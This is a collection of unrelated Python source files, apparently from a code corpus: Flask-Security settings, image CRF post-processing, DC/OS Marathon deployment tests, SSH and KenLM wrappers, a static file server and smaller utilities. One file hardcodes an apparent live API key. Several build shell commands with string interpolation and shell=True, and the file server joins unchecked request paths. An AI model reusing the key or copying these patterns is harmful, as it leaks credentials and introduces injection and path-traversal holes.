SECURITY_ANONYMOUS_USER = AnonymousUser
"""
Class to use for representing anonymous users.
"""
SECURITY_UNAUTHORIZED_CALLBACK = lambda: abort(HTTPStatus.UNAUTHORIZED)
"""
This callback gets called when authorization fails. By default we abort with
an HTTP status code of 401 (UNAUTHORIZED).
"""
# make datetimes timezone-aware by default
SECURITY_DATETIME_FACTORY = lambda: datetime.now(timezone.utc)
"""
Factory function to use when creating new dates. By default we use
``datetime.now(timezone.utc)`` to create a timezone-aware datetime.
"""
ADMIN_CATEGORY_ICON_CLASSES = {
'Security': 'fa fa-lock',
}
class TestConfig(Config):
"""
Default test settings for the Security Bundle.
"""
SECURITY_PASSWORD_HASH = 'plaintext'
"""
Disable password-hashing in tests (shaves about 30% off the test-run time)
"""
|
39984
|
import numpy as np
import pydensecrf.densecrf as dcrf
from pydensecrf.utils import compute_unary, create_pairwise_bilateral, create_pairwise_gaussian, unary_from_softmax
def dense_crf(img, prob):
'''
input:
img: numpy array of shape (num of channels, height, width)
prob: numpy array of shape (9, height, width), neural network last layer sigmoid output for img
output:
res: (height, width)
Modified from:
http://warmspringwinds.github.io/tensorflow/tf-slim/2016/12/18/image-segmentation-with-tensorflow-using-cnns-and-conditional-random-fields/
https://github.com/yt605155624/tensorflow-deeplab-resnet/blob/e81482d7bb1ae674f07eae32b0953fe09ff1c9d1/inference_crf.py
'''
img = np.swapaxes(img, 0, 2)
# img.shape: (width, height, num of channels)(224,224,3)
num_iter = 50
prob = np.swapaxes(prob, 1, 2) # prob.shape: (num_classes, width, height) (9, 224, 224)
num_classes = 9 #2
d = dcrf.DenseCRF2D(img.shape[0] , img.shape[1], num_classes)
unary = unary_from_softmax(prob) # shape: (num_classes, width * height)
unary = np.ascontiguousarray(unary)
img = np.ascontiguousarray(img,dtype=np.uint8)
d.setUnaryEnergy(unary)
d.addPairwiseBilateral(sxy=5, srgb=3, rgbim=img, compat=3)
Q = d.inference(num_iter) # set the number of iterations
res = np.argmax(Q, axis=0).reshape((img.shape[0], img.shape[1]))
# res.shape: (width, height)
res = np.swapaxes(res, 0, 1) # res.shape: (height, width)
# res = res[np.newaxis, :, :] # res.shape: (1, height, width)
# func_end = time.time()
# print('{:.2f} sec spent on CRF with {} iterations'.format(func_end - func_start, num_iter))
# about 2 sec for a 1280 * 960 image with 5 iterations
return res
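# Illustrative usage sketch (the names below are assumptions): given `image_chw`, a
# (3, H, W) uint8 array, and `softmax_chw`, the (9, H, W) per-class probabilities for
# that image, the CRF returns an (H, W) label map:
#
#     refined_labels = dense_crf(image_chw, softmax_chw)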
|
40040
|
import logging
import uuid
from typing import Any
import pytest
import requests
import test_helpers
from dcos_test_utils import marathon
from dcos_test_utils.dcos_api import DcosApiSession
__maintainer__ = 'kensipe'
__contact__ = '<EMAIL>'
log = logging.getLogger(__name__)
def deploy_test_app_and_check(dcos_api_session: DcosApiSession, app: dict, test_uuid: str) -> None:
"""This method deploys the test server app and then
pings its /operating_environment endpoint to retrieve the container
user running the task.
In a mesos container, this will be the marathon user.
In a docker container this user comes from the USER setting
in the app's Dockerfile, which, for the test application,
is the default: root.
"""
expanded_config = test_helpers.get_expanded_config()
default_os_user = 'nobody' if expanded_config.get('security') == 'strict' else 'root'
if 'container' in app and app['container']['type'] == 'DOCKER':
marathon_user = 'root'
else:
marathon_user = app.get('user', default_os_user)
with dcos_api_session.marathon.deploy_and_cleanup(app):
service_points = dcos_api_session.marathon.get_app_service_endpoints(app['id'])
r = requests.get('http://{}:{}/test_uuid'.format(service_points[0].host, service_points[0].port))
if r.status_code != 200:
msg = "Test server replied with non-200 reply: '{0} {1}. "
msg += "Detailed explanation of the problem: {2}"
raise Exception(msg.format(r.status_code, r.reason, r.text))
r_data = r.json()
assert r_data['test_uuid'] == test_uuid
r = requests.get('http://{}:{}/operating_environment'.format(
service_points[0].host,
service_points[0].port))
if r.status_code != 200:
msg = "Test server replied with non-200 reply: '{0} {1}. "
msg += "Detailed explanation of the problem: {2}"
raise Exception(msg.format(r.status_code, r.reason, r.text))
json_uid = r.json()['uid']
if marathon_user == 'root':
assert json_uid == 0, "App running as root should have uid 0."
else:
assert json_uid != 0, ("App running as {} should not have uid 0.".format(marathon_user))
@pytest.mark.first
def test_docker_image_availability() -> None:
assert test_helpers.docker_pull_image("debian:stretch-slim"), "docker pull failed for image used in the test"
def test_if_marathon_app_can_be_deployed(dcos_api_session: DcosApiSession) -> None:
"""Marathon app deployment integration test
This test verifies that marathon app can be deployed, and that service points
returned by Marathon indeed point to the app that was deployed.
The application being deployed is a simple http server written in python.
Please see test_server.py for more details.
This is done by assigning a unique UUID to each app and passing it to the
docker container as an env variable. After successful deployment, the
"GET /test_uuid" request is issued to the app. If the returned UUID matches
the one assigned to test - test succeeds.
"""
deploy_test_app_and_check(dcos_api_session, *test_helpers.marathon_test_app())
def test_if_docker_app_can_be_deployed(dcos_api_session: DcosApiSession) -> None:
"""Marathon app inside docker deployment integration test.
Verifies that a marathon app inside of a docker daemon container can be
deployed and accessed as expected.
"""
deploy_test_app_and_check(
dcos_api_session,
*test_helpers.marathon_test_app(
network=marathon.Network.BRIDGE,
container_type=marathon.Container.DOCKER,
container_port=9080))
@pytest.mark.parametrize('healthcheck', [
marathon.Healthcheck.HTTP,
marathon.Healthcheck.MESOS_HTTP,
])
def test_if_ucr_app_can_be_deployed(dcos_api_session: DcosApiSession, healthcheck: Any) -> None:
"""Marathon app inside ucr deployment integration test.
Verifies that a marathon docker app inside of a ucr container can be
deployed and accessed as expected.
"""
deploy_test_app_and_check(
dcos_api_session,
*test_helpers.marathon_test_app(
container_type=marathon.Container.MESOS,
healthcheck_protocol=healthcheck))
def test_if_marathon_app_can_be_deployed_with_mesos_containerizer(dcos_api_session: DcosApiSession) -> None:
"""Marathon app deployment integration test using the Mesos Containerizer
This test verifies that a Marathon app using the Mesos containerizer with
a Docker image can be deployed.
This is done by assigning a unique UUID to each app and passing it to the
docker container as an env variable. After successful deployment, the
"GET /test_uuid" request is issued to the app. If the returned UUID matches
the one assigned to test - test succeeds.
When port mapping is available (MESOS-4777), this test should be updated to
reflect that.
"""
deploy_test_app_and_check(
dcos_api_session,
*test_helpers.marathon_test_app(container_type=marathon.Container.MESOS))
def test_if_marathon_app_can_be_deployed_with_nfs_csi_volume(dcos_api_session: DcosApiSession) -> None:
"""Marathon app deployment integration test using an NFS CSI volume.
This test verifies that a Marathon app can be deployed which attaches to
an NFS volume provided by the NFS CSI plugin. In order to accomplish this,
we must first set up an NFS share on one agent.
"""
# We will run an NFS server on one agent and an app on another agent to
# verify CSI volume functionality.
if len(dcos_api_session.slaves) < 2:
pytest.skip("CSI Volume Tests require a minimum of two agents.")
expanded_config = test_helpers.get_expanded_config()
if expanded_config.get('security') == 'strict':
pytest.skip('Cannot setup NFS server as root user with EE strict mode enabled')
test_uuid = uuid.uuid4().hex
hosts = dcos_api_session.slaves[0], dcos_api_session.slaves[1]
# A helper to run a Metronome job as root to clean up the NFS share on an agent.
# We define this here so that it can be used during error handling.
def cleanup_nfs() -> None:
cleanup_command = """
sudo systemctl stop nfs-server && \
echo '' | sudo tee /etc/exports && \
sudo systemctl restart nfs-utils && \
sudo exportfs -arv && \
sudo rm -rf /var/lib/dcos-nfs-shares/test-volume-001
"""
cleanup_job = {
'description': 'Clean up NFS share',
'id': 'nfs-share-cleanup-{}'.format(test_uuid),
'run': {
'cmd': cleanup_command,
'cpus': 0.5,
'mem': 256,
'disk': 32,
'user': 'root',
'restart': {'policy': 'ON_FAILURE'},
'placement': {
'constraints': [{
'attribute': '@hostname',
'operator': 'LIKE',
'value': hosts[0]
}]
}
}
}
dcos_api_session.metronome_one_off(cleanup_job)
# Run a Metronome job as root to set up the NFS share on an agent.
command = """sudo mkdir -p /var/lib/dcos-nfs-shares/test-volume-001 && \
sudo chown -R nobody: /var/lib/dcos-nfs-shares/test-volume-001 && \
sudo chmod 777 /var/lib/dcos-nfs-shares/test-volume-001 && \
echo '/var/lib/dcos-nfs-shares/test-volume-001 *(rw,sync)' | sudo tee /etc/exports && \
sudo systemctl restart nfs-utils && \
sudo exportfs -arv && \
sudo systemctl start nfs-server && \
sudo systemctl enable nfs-server
"""
setup_job = {
'description': 'Set up NFS share',
'id': 'nfs-share-setup-{}'.format(test_uuid),
'run': {
'cmd': command,
'cpus': 0.5,
'mem': 256,
'disk': 32,
'user': 'root',
'restart': {'policy': 'ON_FAILURE'},
'placement': {
'constraints': [{
'attribute': '@hostname',
'operator': 'LIKE',
'value': hosts[0]
}]
}
}
}
dcos_api_session.metronome_one_off(setup_job)
# Create an app which writes to the NFS volume.
app = {
'id': 'csi-nfs-write-app-{}'.format(test_uuid),
'instances': 1,
'cpus': 0.5,
'mem': 256,
'cmd': 'echo some-stuff > test-volume-dir/output && sleep 999999',
'user': 'root',
'container': {
'type': 'MESOS',
'volumes': [{
'mode': 'rw',
'containerPath': 'test-volume-dir',
'external': {
'provider': 'csi',
'name': 'test-volume-001',
'options': {
'pluginName': 'nfs.csi.k8s.io',
'capability': {
'accessType': 'mount',
'accessMode': 'MULTI_NODE_MULTI_WRITER',
'fsType': 'nfs'
},
'volumeContext': {
'server': hosts[0],
'share': '/var/lib/dcos-nfs-shares/test-volume-001'
}
}
}
}]
},
'constraints': [
[
'hostname',
'LIKE',
hosts[1]
]
],
'healthChecks': [{
'protocol': 'COMMAND',
'command': {'value': 'test `cat test-volume-dir/output` = some-stuff'},
'gracePeriodSeconds': 5,
'intervalSeconds': 10,
'timeoutSeconds': 10,
'maxConsecutiveFailures': 3
}]
}
try:
with dcos_api_session.marathon.deploy_and_cleanup(app):
# Trivial app: if it deploys, there is nothing else to check
pass
except Exception:
raise
finally:
cleanup_nfs()
def test_if_marathon_pods_can_be_deployed_with_mesos_containerizer(dcos_api_session: DcosApiSession) -> None:
"""Marathon pods deployment integration test using the Mesos Containerizer
This test verifies that a Marathon pods can be deployed.
"""
test_uuid = uuid.uuid4().hex
# create pod with trivial apps that function as long running processes
pod_definition = {
'id': '/integration-test-pods-{}'.format(test_uuid),
'scaling': {'kind': 'fixed', 'instances': 1},
'environment': {'PING': 'PONG'},
'containers': [
{
'name': 'ct1',
'resources': {'cpus': 0.1, 'mem': 32},
'image': {'kind': 'DOCKER', 'id': 'debian:stretch-slim'},
'exec': {'command': {'shell': 'touch foo; while true; do sleep 1; done'}},
'healthcheck': {'command': {'shell': 'test -f foo'}}
},
{
'name': 'ct2',
'resources': {'cpus': 0.1, 'mem': 32},
'exec': {'command': {'shell': 'echo $PING > foo; while true; do sleep 1; done'}},
'healthcheck': {'command': {'shell': 'test $PING = `cat foo`'}}
}
],
'networks': [{'mode': 'host'}]
}
with dcos_api_session.marathon.deploy_pod_and_cleanup(pod_definition):
# Trivial app: if it deploys, there is nothing else to check
pass
|
40105
|
import pexpect
class SshConnection:
'''
To use, set conn_cmd in your json to "ssh [email protected] -i ~/.ssh/id_rsa"
and set connection_type to "ssh"
'''
def __init__(self, device=None, conn_cmd=None, ssh_password='<PASSWORD>', **kwargs):
self.device = device
self.conn_cmd = conn_cmd
self.ssh_password = ssh_password
def connect(self):
pexpect.spawn.__init__(self.device,
command='/bin/bash',
args=['-c', self.conn_cmd])
try:
result = self.device.expect(["assword:", "passphrase"] + self.device.prompt)
except pexpect.EOF as e:
raise Exception("Board is in use (connection refused).")
if result == 0 or result == 1:
assert self.ssh_password is not None, "Please add ssh_password in your json configuration file."
self.device.sendline(self.ssh_password)
self.device.expect(self.device.prompt)
def close(self):
self.device.sendline('exit')
|
40115
|
from config import *
from helper_func import *
class coordinates_data_files_list(object):
def __init__(self,
list_of_dir_of_coor_data_files = CONFIG_1, # these are the directories that hold coordinates data files
):
assert (isinstance(list_of_dir_of_coor_data_files, list)) # to avoid passing the string in the constructor
self._list_of_dir_of_coor_data_files = list_of_dir_of_coor_data_files
self._list_of_coor_data_files = []
for item in self._list_of_dir_of_coor_data_files:
self._list_of_coor_data_files += subprocess.check_output('''find %s -name "*coordinates.npy"''' % item, shell=True).decode("utf-8").strip().split('\n')
self._list_of_coor_data_files = list(set(self._list_of_coor_data_files)) # remove duplicates
self._list_of_coor_data_files = [x for x in self._list_of_coor_data_files if os.stat(x).st_size > 0] # remove empty files
self._list_of_coor_data_files.sort() # to be consistent
self._list_num_frames = [np.load(_1).shape[0] for _1 in self._list_of_coor_data_files]
return
def create_sub_coor_data_files_list_using_filter_conditional(self, filter_conditional):
"""
:param filter_conditional: a lambda conditional expression on file names
:return: a coordinates_data_files_list object
"""
temp_coor_files = list(filter(filter_conditional, self._list_of_coor_data_files))
return coordinates_data_files_list(temp_coor_files)
def get_list_of_coor_data_files(self):
return self._list_of_coor_data_files
def get_coor_data(self, scaling_factor, format='npy'):
result = np.concatenate([
Helper_func.load_npy(item, format=format) for item in self._list_of_coor_data_files], axis=0) / scaling_factor
assert (sum(self._list_num_frames) == result.shape[0])
return result
def get_list_of_corresponding_pdb_dcd(self):
list_of_corresponding_pdb_files = [x.strip().replace('_coordinates.npy', '.pdb') for x in self.get_list_of_coor_data_files()]
for item in range(len(list_of_corresponding_pdb_files)):
if not os.path.exists(list_of_corresponding_pdb_files[item]):
list_of_corresponding_pdb_files[item] = list_of_corresponding_pdb_files[item].replace('.pdb', '.dcd')
try:
assert os.path.exists(list_of_corresponding_pdb_files[item])
except:
raise Exception('%s does not exist!' % list_of_corresponding_pdb_files[item])
return list_of_corresponding_pdb_files
def write_pdb_frames_into_file_with_list_of_coor_index(self, list_of_coor_index, out_file_name, verbose=True):
"""
This function picks several frames from pdb files, and write a new pdb file as output,
we could use this together with the mouse-clicking callback implemented in the scatter plot:
first we select a few points interactively in the scatter plot, and get corresponding index in the data point
list, then we find the corresponding pdb frames with the index
"""
Helper_func.backup_rename_file_if_exists(out_file_name)
list_of_coor_index.sort()
pdb_files = self.get_list_of_corresponding_pdb_dcd()
accum_sum = np.cumsum(np.array(self._list_num_frames)) # use accumulative sum to find corresponding pdb files
for item in range(len(accum_sum)):
if item == 0:
temp_index_related_to_this_pdb_file = [x for x in list_of_coor_index if x < accum_sum[item]]
else:
temp_index_related_to_this_pdb_file = [x for x in list_of_coor_index if accum_sum[item - 1] <= x < accum_sum[item]]
temp_index_related_to_this_pdb_file = [x - accum_sum[item - 1] for x in temp_index_related_to_this_pdb_file]
temp_index_related_to_this_pdb_file.sort()
if len(temp_index_related_to_this_pdb_file) != 0:
if verbose: print(pdb_files[item])
with open(pdb_files[item], 'r') as in_file:
content = in_file.read().split('MODEL')[1:] # remove header
frames_to_use = [content[ii] for ii in temp_index_related_to_this_pdb_file]
with open(out_file_name, 'a') as out_file:
for frame in frames_to_use:
out_file.write("MODEL" + frame)
return
def get_pdb_name_and_corresponding_frame_index_with_global_coor_index(self, coor_index):
for item, temp_pdb in zip(self._list_num_frames, self.get_list_of_corresponding_pdb_dcd()):
if coor_index < item: break
else: coor_index -= item
return temp_pdb, coor_index
def concat_all_pdb_files(self, out_pdb_file):
"""
Why not use 'cat' in the terminal? Because we want the order to be consistent with Python's sort() function
"""
with open(out_pdb_file, 'w') as outfile:
for fname in self.get_list_of_corresponding_pdb_dcd():
with open(fname) as infile:
outfile.write(infile.read())
return
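# Illustrative usage sketch (the directory below is an assumption):
#
#     cdfl = coordinates_data_files_list(['./coordinates_data'])
#     coords = cdfl.get_coor_data(scaling_factor=1.0)          # concatenated frames, scaled
#     pdb_files = cdfl.get_list_of_corresponding_pdb_dcd()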
|
40116
|
from django.contrib.admin import ModelAdmin
from public_admin.sites import PublicAdminSite
class PublicModelAdmin(ModelAdmin):
"""This mimics the Django's native ModelAdmin but filters URLs that should
not exist in a public admin, and deals with request-based permissions."""
def has_view_permission(self, request, obj=None):
"""Only allows view requests if the method is GET"""
return request.method == "GET"
def has_add_permission(self, request):
"""Denies permission to any request trying to add new objects."""
return False
def has_change_permission(self, request, obj=None):
"""Denies permission to any request trying to change objects."""
return False
def has_delete_permission(self, request, obj=None):
"""Denies permission to any request trying to delete objects."""
return False
def get_urls(self):
"""Filter out the URLs that should not exist in a public admin."""
return [url for url in super().get_urls() if PublicAdminSite.valid_url(url)]
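# Illustrative registration sketch (assumes a PublicAdminSite instance `public_admin_site`
# and a model named `Document` defined elsewhere in the project):
#
#     public_admin_site.register(Document, PublicModelAdmin)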
|
40146
|
import indicoio, os, json
indicoio.config.api_key = '27df1eee04c5b65fb3113e9458d1d701'
fileDir = os.path.dirname(os.path.realpath('__file__'))
fileResumeTxt = open(os.path.join(fileDir, "data/resume.txt"), 'w')
resume = "data/resumePDF.pdf"
print(json.dumps(indicoio.pdf_extraction(resume)))
|
40226
|
import numpy as np
def directional_coupler_lc(wavelength_nm, n_eff_1, n_eff_2):
'''
Calculates the coherence length (100% power transfer) of a
directional coupler.
Args:
wavelength_nm (float): The wavelength in [nm] the
directional coupler should operate at.
n_eff_1 (float): n_eff of the fundamental (even)
supermode of the directional coupler.
n_eff_2 (float): n_eff of the first-order (odd)
supermode of the directional coupler.
Returns:
float: The length [um] the directional coupler
needs to be to achieve 100% power transfer.
'''
wavelength_m = wavelength_nm * 1.e-9
dn_eff = (n_eff_1 - n_eff_2).real
lc_m = wavelength_m / (2. * dn_eff)
lc_um = lc_m * 1.e6
return lc_um
def grating_coupler_period(wavelength,
n_eff,
n_clad,
incidence_angle_deg,
diffration_order=1):
'''
Calculate the period needed for a grating coupler.
Args:
wavelength (float): The target wavelength for the
grating coupler.
n_eff (float): The effective index of the mode
of a waveguide with the width of the grating
coupler.
n_clad (float): The refractive index of the cladding.
incidence_angle_deg (float): The incidence angle
the grating coupler should operate at [degrees].
diffration_order (int): The grating order the coupler
should work at. Default is 1st order (1).
Returns:
float: The period needed for the grating coupler
in the same units as the wavelength was given at.
'''
k0 = 2. * np.pi / wavelength
beta = n_eff.real * k0
n_inc = n_clad
grating_period = (2.*np.pi*diffration_order) \
/ (beta - k0*n_inc*np.sin(np.radians(incidence_angle_deg)))
return grating_period
def loss(n, wavelength):
kappa = n.imag
alpha = 4.34 * 4 * np.pi * np.abs(
kappa) / wavelength # 4.34 = 10*np.log10(np.e) -> [dB/m] = 4.34 [/m]
return alpha # [db/um] if working in [um]
def qpm_wavenumber(pmp_n,
pmp_l,
sig_n,
sig_l,
idl_n,
idl_l,
period_qpm,
type='forward'):
pi2 = np.pi * 2
k_pmp = pmp_n * pi2 / pmp_l
k_sig = sig_n * pi2 / sig_l
k_idl = idl_n * pi2 / idl_l
k_qpm = pi2 / period_qpm
if type == 'forward':
sgn_1 = 1
sgn_2 = 1
elif type == 'forward_backward':
sgn_1 = 1
sgn_2 = -1
elif type == 'backward':
sgn_1 = -1
sgn_2 = -1
else:
raise ValueError("type must be 'forward', 'forward_backward' or 'backward'")
k_mismatch = k_idl * sgn_1 + k_sig * sgn_2 + k_qpm - k_pmp
return k_mismatch
def qpm_period(pmp_n, pmp_l, sig_n, sig_l, idl_n, idl_l, type='forward'):
pi2 = np.pi * 2
k_pmp = pmp_n * pi2 / pmp_l
k_sig = sig_n * pi2 / sig_l
k_idl = idl_n * pi2 / idl_l
if type == 'forward':
sgn_1 = 1
sgn_2 = 1
elif type == 'forward_backward':
sgn_1 = 1
sgn_2 = -1
elif type == 'backward':
sgn_1 = -1
sgn_2 = -1
else:
raise ValueError("type must be 'forward', 'forward_backward' or 'backward'")
k_qpm = k_pmp - k_idl * sgn_1 - k_sig * sgn_2
l_qpm = pi2 / k_qpm
return l_qpm
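# Illustrative usage sketch (numeric values below are made up for demonstration):
#
#     lc_um = directional_coupler_lc(1550., 2.45, 2.40)        # coherence length in [um]
#     period = grating_coupler_period(1.55, 2.85, 1.44, 8.)    # same units as the wavelength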
|
40263
|
from abc import ABCMeta
from layers.linear import *
from layers.conv2d import *
import torch.nn as nn
# Add custom layers here.
_STN_LAYERS = [StnLinear, StnConv2d]
class StnModel(nn.Module, metaclass=ABCMeta):
# Initialize an attribute self.layers (a list containing all layers).
def get_layers(self):
raise NotImplementedError
def get_response_parameters(self):
""" Return the response parameters.
:return: List[Tensors]
"""
params = []
for idx, layer in enumerate(self.get_layers()):
for stn_layer in _STN_LAYERS:
if isinstance(layer, stn_layer):
params = params + layer.response_parameters
return params
def get_general_parameters(self):
""" Return the general parameters.
:return: List[Tensors]
"""
params = []
for idx, layer in enumerate(self.get_layers()):
is_stn_layer = False
for stn_layer in _STN_LAYERS:
if isinstance(layer, stn_layer):
is_stn_layer = True
params = params + layer.general_parameters
break
if not is_stn_layer:
params = params + [p for p in layer.parameters()]
return params
def forward(self, x, h_net, h_param):
""" A forward pass for StnModel.
:param x: Input Tensor
:param h_net: Tensor of size 'batch_size x num_hyper'
:param h_param: Tensor of size 'batch_size x num_hyper'
:return: Output Tensor
"""
raise NotImplementedError()
|
40308
|
import frappe
def after_migrate():
set_default_otp_template()
def set_default_otp_template():
if not frappe.db.get_value("System Settings", None, "email_otp_template"):
if frappe.db.exists("Email Template", "Default Email OTP Template"):
# should exist via fixtures
frappe.db.set_value("System Settings", None, "email_otp_template", "Default Email OTP Template")
if not frappe.db.get_value("System Settings", None, "sms_otp_template"):
if frappe.db.exists("SMS Template", "Default SMS OTP Template"):
# should exist via fixtures
frappe.db.set_value("System Settings", None, "sms_otp_template", "Default SMS OTP Template")
|
40315
|
import factory
class ServiceCategoryFactory(factory.django.DjangoModelFactory):
class Meta:
model = "core.ServiceCategory"
name = factory.Sequence(lambda n: f"Service Category {n}")
slug = factory.Sequence(lambda n: f"service-category-{n}")
description = factory.Faker("sentence")
icon = "categories/shelter.png"
class ServiceFactory(factory.django.DjangoModelFactory):
class Meta:
model = "core.Service"
name = factory.Sequence(lambda n: f"Service {n}")
organization_name = factory.Faker("company")
description = factory.Faker("paragraph")
website = factory.Faker("url")
street_address = factory.Faker("street_address")
city = factory.Faker("city")
state = factory.Faker("state_abbr")
zip_code = factory.Faker("postcode")
latitude = factory.Faker("latitude")
longitude = factory.Faker("longitude")
operating_hours = "9am - 5pm Monday-Friday"
phone_number = factory.Faker("phone_number")
email = factory.Faker("email")
category = factory.SubFactory(ServiceCategoryFactory)
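# Illustrative usage sketch (typically called inside a test with database access enabled):
#
#     service = ServiceFactory()                         # persists a Service with faked fields
#     shelter = ServiceCategoryFactory(name="Shelter")   # override any generated field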
|
40348
|
class TransportType:
NAPALM = "napalm"
NCCLIENT = "ncclient"
NETMIKO = "netmiko"
class DeviceType:
IOS = "ios"
NXOS = "nxos"
NXOS_SSH = "nxos_ssh"
NEXUS = "nexus"
CISCO_NXOS = "cisco_nxos"
|
40365
|
import os
import os.path
import webapp2
import logging
from webapp2 import WSGIApplication, Route
from google.appengine.api import users
# hack until we can make this public
cache = dict()
class Content(webapp2.RequestHandler):
def get(self, *args, **kwargs):
urlPath = args[0]
root = os.path.split(__file__)[0]
errorPath = os.path.join(root, '404', 'index.html')
try:
paths = [
os.path.join(root, urlPath + '.html'),
os.path.join(root, urlPath + 'index.html'),
os.path.join(root, urlPath + '/index.html'),
os.path.join(root, urlPath)
]
validPaths = [path for path in paths if os.path.isfile(path)]
if len(validPaths) > 0:
path = validPaths[0]
else:
path = errorPath
self.response.set_status(404)
if path.endswith(".css"):
self.response.headers['Content-Type'] = 'text/css'
elif path.endswith(".js"):
self.response.headers['Content-Type'] = 'application/javascript'
elif path.endswith(".html"):
self.response.headers['Content-Type'] = 'text/html'
elif path.endswith(".svg"):
self.response.headers['Content-Type'] = 'image/svg+xml'
self.response.headers['Cache-Control'] = 'public, max-age=300' # 5 minutes
key = 'pages-' + path
if key in cache:
self.response.out.write(cache[key])
else:
f = open(path, 'r')
content = f.read()
cache[key] = content
self.response.out.write(content)
except Exception:
logging.exception("unable to serve page")
path = errorPath
f = open(path, 'r')
content = f.read()
self.response.out.write(content)
self.response.set_status(404)
app = WSGIApplication([
Route(r'/<:.*>', handler=Content)
], debug=True)
|
40373
|
import kenlm
import os
import pickle
import tempfile
import zipfile
from config import KENLM_PATH
from pyro_utils import BGProc
from config import PORT_NUMBER, TEMP_DIR
import time
import subprocess
import shlex
def _unzip_to_tempdir(model_zip_path):
# temp folder (automatically deleted on exit)
tmpdir = tempfile.mkdtemp(dir=TEMP_DIR)
# unzip model into tempdir
with zipfile.ZipFile(model_zip_path, 'r', allowZip64=True) as zip_ref:
zip_ref.extractall(tmpdir)
return tmpdir
def _zip_to_model(tmpdir, model_zip_path):
# make pickle file with model options
# create zipfile archive
zf = zipfile.ZipFile(model_zip_path, 'w', allowZip64=True)
zf.compress_type = zipfile.ZIP_DEFLATED # saw a note that this helps with backwards compat
# Adding files from directory 'files'
for _, _, files in os.walk(tmpdir):
for f in files:
zf.write(os.path.join(tmpdir, f), f)
class AbstractLM(object):
def train(self, path_to_text):
raise NotImplementedError()
def save(self, model_file_name):
raise NotImplementedError()
def load(self, model_file_name):
raise NotImplementedError()
def score(self, sentences):
raise NotImplementedError()
def _assert_initilized(self):
if not hasattr(self, 'tmpdir'):
raise Exception('Did you forget to run train or load first?')
class DummyLM(AbstractLM):
def train(self, path_to_text):
pass
def save(self, model_file_name):
self.tmpdir = tempfile.mkdtemp(dir=TEMP_DIR)
params = dict(model_type='dummy')
pkl_fname = os.path.join(self.tmpdir, 'params.pkl')
with open(pkl_fname, 'w') as fileObject:
pickle.dump(params, fileObject)
_zip_to_model(self.tmpdir, model_file_name)
def load(self, model_file_name):
pass
def score(self, sentences):
return [-42.0 for _ in sentences]
class KenLM(AbstractLM):
"""
implements simple wrapper around kenlm
model is saved as kenlm_model.binary in zip file
model_type is "kenlm"
"""
def wrap_existing_kenlm_model(self, kenlm_model):
if not (kenlm_model.endswith('.binary') or '.binlm' in kenlm_model):
raise Exception('expected file with .binlm* or .binary extension')
self.tmpdir = tempfile.mkdtemp(dir=TEMP_DIR)
model_binary_path = os.path.join(self.tmpdir, 'kenlm_model.binary')
subprocess.check_call('cp %s %s'%(kenlm_model, model_binary_path), shell=True)
self.kenlm_model = kenlm.Model(model_binary_path)
def train(self, path_to_text):
# also stores binary in temp directory
self.tmpdir = tempfile.mkdtemp(dir=TEMP_DIR)
model_arpa_path = os.path.join(self.tmpdir, 'kenlm_model.arpa')
model_binary_path = os.path.join(self.tmpdir, 'kenlm_model.binary')
myinput = open(path_to_text)
myoutput = open(model_arpa_path, 'w')
args = shlex.split(os.path.join(KENLM_PATH, 'bin/lmplz') + ' -o 5 -S 40% --skip_symbols </s> <unk>')
# from kenlm exception: --skip_symbols: to avoid this exception:
# Special word </s> is not allowed in the corpus. I plan to support models containing <unk> in the future.
# Pass --skip_symbols to convert these symbols to whitespace.
p = subprocess.Popen(args, stdin=myinput, stdout=myoutput)
p.wait()
#convert arpa to binary
p = subprocess.Popen(shlex.split('%s %s %s' % (os.path.join(KENLM_PATH, 'bin/build_binary'), model_arpa_path, model_binary_path)))
p.wait()
#remove arpa file
p=subprocess.Popen(shlex.split('rm %s' % model_arpa_path))
p.wait()
#lm_bin = os.path.join(KENLM_PATH, 'bin/lmplz')
#binarize_bin = os.path.join(KENLM_PATH, 'bin/build_binary')
#subprocess.check_call('%s -o 5 -S 40%% > %s' % (lm_bin, model_arpa_path))
#subprocess.check_call('%s %s %s' % (binarize_bin, model_arpa_path, model_binary_path))
#subprocess.check_call('rm %s' % model_arpa_path)
self.kenlm_model = kenlm.Model(model_binary_path)
def save(self, model_file_name):
"""
save trained model to disk
TODO (nice to have): write anything that seems useful (training parameters, date trained, etc) to params.pkl
"""
if not model_file_name.endswith('.zip'):
raise Exception('expected output file to have .zip extension')
self._assert_initilized()
params = dict(model_type='kenlm')
pkl_fname = os.path.join(self.tmpdir, 'params.pkl')
with open(pkl_fname, 'w') as fileObject:
pickle.dump(params, fileObject)
_zip_to_model(self.tmpdir, model_file_name)
def load(self, model_file_name):
self.tmpdir = _unzip_to_tempdir(model_file_name)
self.kenlm_model = kenlm.Model(os.path.join(self.tmpdir, 'kenlm_model.binary'))
def score(self, sentences):
self._assert_initilized()
return [self.kenlm_model.score(sent, bos=True, eos=True) for sent in sentences]
def lm_factory(model_file_name):
"""
Peek inside model and see which language model class should open it,
and return an instantiation of that class, with said model loaded
:param model_file_name: NematusLL language model file (zip containing params.pkl, etc)
:return: instantiated language model class (implements AbstractLM interface)
"""
print 'creating class map'
class_map = dict(kenlm=KenLM,
dummy=DummyLM)
print 'loading pickle file'
with zipfile.ZipFile(model_file_name, 'r') as zf:
with zf.open('params.pkl') as fh:
params = pickle.load(fh)
print 'setting model type'
model_type = params['model_type']
LM_Class = class_map[model_type]
lm = LM_Class()
print 'loading model file'
lm.load(model_file_name)
return lm
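# Illustrative usage sketch (assumes 'my_lm.zip' was produced by KenLM.save above):
#
#     lm = lm_factory('my_lm.zip')
#     print lm.score(['this is a test sentence', 'another sentence'])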
|
40389
|
import os
import subprocess
from pathlib import Path
from ..views.viewhelper import delay_refresh_detail
from ..helper.config import config
def edit(filepath: Path, loop):
if isinstance(filepath, str):
filepath = Path(filepath)
editor = os.environ.get('EDITOR', 'vi').lower()
# vim
if editor == 'vi' or editor == 'vim':
cmd = editor + ' ' + str(filepath)
current_directory = Path.cwd()
os.chdir(filepath.parent)
if config.tmux_support and is_inside_tmux():
open_in_new_tmux_window(cmd)
else:
subprocess.call(cmd, shell=True)
delay_refresh_detail(loop)
os.chdir(current_directory)
# sublime text
elif editor == 'sublime':
cmd = 'subl ' + str(filepath)
subprocess.call(cmd, shell=True)
def is_inside_tmux():
return 'TMUX' in os.environ
def open_in_new_tmux_window(edit_cmd):
# close other panes if they exist, so that the detail pane is the only pane
try:
output = subprocess.check_output("tmux list-panes | wc -l", shell=True)
num_pane = int(output)
if num_pane > 1:
subprocess.check_call("tmux kill-pane -a", shell=True)
except Exception:
pass
cmd = "tmux split-window -h"
os.system(cmd)
cmd = "tmux send-keys -t right '%s' C-m" % edit_cmd
